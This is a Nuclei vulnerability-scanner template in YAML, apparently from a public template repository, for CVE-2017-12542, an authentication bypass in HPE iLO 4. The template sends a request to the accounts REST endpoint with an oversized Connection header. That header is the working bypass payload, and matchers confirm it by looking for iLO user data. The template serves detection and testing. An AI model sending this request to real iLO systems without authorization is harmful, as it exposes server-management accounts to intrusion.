nuclei-templates/cves/2017/CVE-2017-12542.yaml

35 lines
804 B
YAML

id: CVE-2017-12542
info:
name: ILO4 Authentication bypass
author: pikpikcu
severity: critical
description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542
- https://www.exploit-db.com/exploits/44005
tags: cve,cve2017,ilo4,hpe
requests:
- method: GET
path:
- "{{BaseURL}}/rest/v1/AccountService/Accounts"
headers:
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
matchers-condition: and
matchers:
- type: word
words:
- "iLO User"
part: body
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200